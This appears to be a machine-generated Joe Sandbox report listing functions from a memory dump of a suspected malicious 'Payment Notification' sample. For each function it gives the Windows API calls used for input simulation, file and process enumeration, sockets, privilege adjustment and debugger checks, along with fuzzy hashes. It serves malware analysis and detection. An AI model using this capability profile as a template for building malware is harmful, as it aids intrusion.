Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: 6235c9bfc9b541de8c702fe45e3d595b86ec0f2f6a3fe99b950ba3485f658b4f
Instruction ID: a0751acdddc098631cfd4ed817038ec09e8974735bdbf80c7fd47d73cf5c1873
Opcode Fuzzy Hash: 6235c9bfc9b541de8c702fe45e3d595b86ec0f2f6a3fe99b950ba3485f658b4f
Instruction Fuzzy Hash: D6D13771508201AFC314EF24C881A6BB7E9FFD9704F14896DF5958B2A1EB70ED09CB92

Function 009B22DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 009B22E8

Part of subcall function 009AE4EC: GetWindowRect.USER32(?,?), ref: 009AE504

GetDesktopWindow.USER32 ref: 009B2312
GetWindowRect.USER32(00000000), ref: 009B2319
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 009B2355
GetCursorPos.USER32(?), ref: 009B2381
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 009B23DF

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: 0821bb968a80203b3d91e2839f0465e7715ebcbc5bbdd4f457ed5a3ceae64dbb
Instruction ID: 9e21d155f4a575bf6bfcaf3acbc82c7a8c15670854834b5f5b8e742eb158c52f
Opcode Fuzzy Hash: 0821bb968a80203b3d91e2839f0465e7715ebcbc5bbdd4f457ed5a3ceae64dbb
Instruction Fuzzy Hash: FA31AF72508315ABDB20DF54C949F9BBBEDFF88724F000919F98997191DB34EA09CB92

Function 009A9B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00939CB3: _wcslen.LIBCMT ref: 00939CBD

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 009A9B78
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 009A9C8B

Part of subcall function 009A3874: GetInputState.USER32 ref: 009A38CB
Part of subcall function 009A3874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009A3966

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 009A9BA8
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 009A9C75

Strings

*.*, xrefs: 009A9B5D

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: b94d3e88412e962942120006f153fcca1a9e69549f1d4ded0e09e300d59e9fa1
Instruction ID: fabff0059cfb3a2e144251cea0924b7e95cf885cd4072cd6d5be9f878c0ce310
Opcode Fuzzy Hash: b94d3e88412e962942120006f153fcca1a9e69549f1d4ded0e09e300d59e9fa1
Instruction Fuzzy Hash: BB41517194460A9FCF14DFA4CC49BEEBBB8FF46310F248155E859A2191EB309E44CFA0

Function 0094997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON

Download Yara Rule

APIs

Part of subcall function 00949BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00949BB2

DefDlgProcW.USER32(?,?,?,?,?), ref: 00949A4E
GetSysColor.USER32(0000000F), ref: 00949B23
SetBkColor.GDI32(?,00000000), ref: 00949B36

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Color$LongProcWindow
String ID:
API String ID: 3131106179-0
Opcode ID: a141588cb8936764e96a099dae3a530e9711f304a2bf90d439e991d063ed05c3
Instruction ID: 10a5817b09adb0664687c949b4849acb9b9f804fbcfec5eadb637d354f70f09c
Opcode Fuzzy Hash: a141588cb8936764e96a099dae3a530e9711f304a2bf90d439e991d063ed05c3
Instruction Fuzzy Hash: FEA10870518454BEE729FB7C8C98FBB6A9DDB82350B244609F502C6791CA29DD02D372

Function 009B1806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 009B304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 009B307A
Part of subcall function 009B304E: _wcslen.LIBCMT ref: 009B309B

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 009B185D
WSAGetLastError.WSOCK32 ref: 009B1884
bind.WSOCK32(00000000,?,00000010), ref: 009B18DB
WSAGetLastError.WSOCK32 ref: 009B18E6
closesocket.WSOCK32(00000000), ref: 009B1915

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: 9442b46bad3ed2882bc42a137c91be9eeaa7e9892a1ba008638737d82439cfd4
Instruction ID: 4da42e774a82b97cbe3523349458fd3c0e15ef84804719b9d366bbd139ef9f9a
Opcode Fuzzy Hash: 9442b46bad3ed2882bc42a137c91be9eeaa7e9892a1ba008638737d82439cfd4
Instruction Fuzzy Hash: AE51C6B5A00200AFDB10EF24C996F6A77E5AB84718F44845CFA19AF3D3D771AD41CBA1

Function 009C1C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 009C1CC0
IsWindowEnabled.USER32 ref: 009C1CCE
GetForegroundWindow.USER32(?,?,00000001,?), ref: 009C1CDB
IsIconic.USER32 ref: 009C1CE9
IsZoomed.USER32 ref: 009C1CF7

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 3b8638ba991390a8a117e2d02666d974dab28160f27b56aab66671fa79237398
Instruction ID: 7853e7be362c22085d4c501c86867a007c6c19002f21ae3a5b2544d9e80e15f4
Opcode Fuzzy Hash: 3b8638ba991390a8a117e2d02666d974dab28160f27b56aab66671fa79237398
Instruction Fuzzy Hash: 3A21D671F802115FE7208F1AC844F2A7BA9EF86315F19805CF88A8B352C771EC42CB96

Function 00938060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON

Download Yara Rule

Strings

VUUU, xrefs: 009383FA
VUUU, xrefs: 0093843C
VUUU, xrefs: 009383E8
ERCP, xrefs: 0093813C
VUUU, xrefs: 00975DF0

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: 86496572721cd44da52731d2c5e74eb41debb696b8aae588baa553aba23d92eb
Instruction ID: 796ca30f5fdfca31c5f22a84284610d0893fa773f0efa158e49429da1e9b25a6
Opcode Fuzzy Hash: 86496572721cd44da52731d2c5e74eb41debb696b8aae588baa553aba23d92eb
Instruction Fuzzy Hash: DFA2B172E0061ACBDF24CF58C8457AEB7B5BF44314F2485AAE819A7385EB749D81CF90

Function 009BA67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 009BA6AC
Process32FirstW.KERNEL32(00000000,?), ref: 009BA6BA

Part of subcall function 00939CB3: _wcslen.LIBCMT ref: 00939CBD

Process32NextW.KERNEL32(00000000,?), ref: 009BA79C
CloseHandle.KERNEL32(00000000), ref: 009BA7AB

Part of subcall function 0094CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00973303,?), ref: 0094CE8A

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: f77124c76a4473adfa8cd03e317286524a90ca3645e4c3027d9284dcdea8bfe2
Instruction ID: 40a048d5c3a80a37e2d6b330e654335bd2fc1fb74d3521acddb6bb068e898620
Opcode Fuzzy Hash: f77124c76a4473adfa8cd03e317286524a90ca3645e4c3027d9284dcdea8bfe2
Instruction Fuzzy Hash: AE51F8B1508300AFD710EF25C986A6BBBE8FFC9754F40891DF59997261EB70E904CB92

Function 0099AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0099AAAC
SetKeyboardState.USER32(00000080), ref: 0099AAC8
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0099AB36
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0099AB88

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: ce883344d6679a8eef56b16d6bf1f5b4752aeb1ce2c8d5cd3df326c92339f2ed
Instruction ID: a7f2bfbdd7efbf27c5264fd80cb6073c8dabaf09d32550f5a1f11a2caf61f4a4
Opcode Fuzzy Hash: ce883344d6679a8eef56b16d6bf1f5b4752aeb1ce2c8d5cd3df326c92339f2ed
Instruction Fuzzy Hash: 93312270A40208AFFF348B6D8C05BFA7BAAEB94320F04421AF185921D0D7788981D7E6

Function 009ACE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 009ACE89
GetLastError.KERNEL32(?,00000000), ref: 009ACEEA
SetEvent.KERNEL32(?,?,00000000), ref: 009ACEFE

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: bb515686313367f66ce3b66e44b2a2e509b51debc0b3f63471f021988e053dee
Instruction ID: 790527d72d77fa9ec170bc3fba7d929c7138237a1db839dc665fb2cf9f52bf71
Opcode Fuzzy Hash: bb515686313367f66ce3b66e44b2a2e509b51debc0b3f63471f021988e053dee
Instruction Fuzzy Hash: 8621BDB1904305AFEB20CF65C948BA67BFCEB41358F20482EE64696151E774EE08DB90

Function 0099DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00975222), ref: 0099DBCE
GetFileAttributesW.KERNEL32(?), ref: 0099DBDD
FindFirstFileW.KERNEL32(?,?), ref: 0099DBEE
FindClose.KERNEL32(00000000), ref: 0099DBFA

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: 8e8bfcd64e1f34fbdef29597c4512724505e87bf6d3ab28c2dd50a132e361162
Instruction ID: ada4b984e905960c9a0414b3bdad38bf6ee3244e2dcdecd2d929b4568b33221e
Opcode Fuzzy Hash: 8e8bfcd64e1f34fbdef29597c4512724505e87bf6d3ab28c2dd50a132e361162
Instruction Fuzzy Hash: 72F0A0B0829910578A206B7CEC4D8AA7B6C9E01334B544702F8BAC20E0FBB0995596D5

Function 00998298 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 568stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 009982AA

Strings

(, xrefs: 009982F0
|, xrefs: 009982DA

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 61f6d26a10b41e0763b1ac984e5bf160ce978e96718da5b6756533568863023f
Instruction ID: 29365f21a8b82841ef282104176c30f9da08925dd68145f2e725a08f7021380e
Opcode Fuzzy Hash: 61f6d26a10b41e0763b1ac984e5bf160ce978e96718da5b6756533568863023f
Instruction Fuzzy Hash: 1A323475A007059FCB28CF59C481A6AB7F0FF48710B15C56EE59ADB3A1EB70E981CB50

Function 009A5C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 009A5CC1
FindNextFileW.KERNEL32(00000000,?), ref: 009A5D17
FindClose.KERNEL32(?), ref: 009A5D5F

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: ba61f7215fac9af8f1c0239d6488b90b1539e2568861e05eadf2d3eb983c943b
Instruction ID: 64de4a7bd7d8716584da31bd9b6dbd5f2a000654f101252bd68481644440c77a
Opcode Fuzzy Hash: ba61f7215fac9af8f1c0239d6488b90b1539e2568861e05eadf2d3eb983c943b
Instruction Fuzzy Hash: FB516875604A019FC714CF28C494E96B7E8FF4A324F15855DE9AA8B3A2CB30E905CF91

Function 00962622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0096271A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00962724
UnhandledExceptionFilter.KERNEL32(?), ref: 00962731

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: a02fceb349fcf1b3be1316142bd4454d23f89bed73a77fa2644b9a221dfad147
Instruction ID: 2600c5aed102909f39f7778754b42ca9a210fae21a19f50f9e2f7d332519932a
Opcode Fuzzy Hash: a02fceb349fcf1b3be1316142bd4454d23f89bed73a77fa2644b9a221dfad147
Instruction Fuzzy Hash: 8D31D47491121CABCB21DF69DD89BDCBBB8AF48310F5041EAE81CA7260E7309F858F44

Function 009A51CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 009A51DA
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 009A5238
SetErrorMode.KERNEL32(00000000), ref: 009A52A1

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: c67c3a20b50594f49360870a00cfce72702bb8b89df2d821c42018319ea73afa
Instruction ID: 598c91176c30fe8fa7916c1c2ad5305f2b89b780157526292d09d00d008224a0
Opcode Fuzzy Hash: c67c3a20b50594f49360870a00cfce72702bb8b89df2d821c42018319ea73afa
Instruction Fuzzy Hash: 94317A75A04508DFDB00DF94D884FADBBB4FF49314F098099E809AB3A2CB31E846CB90

Function 009916C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 0094FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00950668
Part of subcall function 0094FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00950685

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0099170D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0099173A
GetLastError.KERNEL32 ref: 0099174A

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: 38e6057b63a55d31ee4e19f3973b64c1a8b0bb3796611242c936a52115cbd4cc
Instruction ID: 80b383b89ac03b96a993c96f15dc42001515e46e3a354f4f6a2b9e4cdbc87d06
Opcode Fuzzy Hash: 38e6057b63a55d31ee4e19f3973b64c1a8b0bb3796611242c936a52115cbd4cc
Instruction Fuzzy Hash: B81194B1814306AFDB189F54DC86E6ABBBDFF44714B24852EE05657641EB70BC418A20

Function 0099D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0099D608
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0099D645
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0099D650

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: a6ed2dd3572510f555e56a4ef05384cadd713a9f598a52cdc2eabf76e3aa52a1
Instruction ID: 48dc3068c1fd34b28652c5e68716d026eb0e805b59b8725a576e6b06f3f19ccf
Opcode Fuzzy Hash: a6ed2dd3572510f555e56a4ef05384cadd713a9f598a52cdc2eabf76e3aa52a1
Instruction Fuzzy Hash: 921161B5E05228BFDB108F99EC85FAFBFBCEB45B50F108115F918E7290D6704A059BA1

Function 00991663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0099168C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 009916A1
FreeSid.ADVAPI32(?), ref: 009916B1

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
